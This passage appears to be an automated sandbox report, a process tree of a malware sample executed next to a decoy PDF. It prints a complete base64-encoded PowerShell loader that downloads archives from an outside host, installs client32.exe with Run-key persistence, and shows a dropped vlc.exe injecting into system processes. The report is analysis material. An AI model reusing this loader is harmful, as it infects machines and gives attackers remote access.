UFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1424
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3316
    - - C:\Users\Admin\AppData\Roaming\TempControll\client32.exe
        
        "C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:3880
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/871dbc7a2ed62746e6998f48369f81dd/" && (for %F in (*.exe) do start "" "%F")"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe
      "vlc.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:1376
    - - C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
        
        C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4528
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3624
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4536
- - C:\Windows\SysWOW64\explorer.exe
    explorer C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4436

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:4260
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:1652
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2952
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D71D573560E32968EF1981A54ED4FC2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3192
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
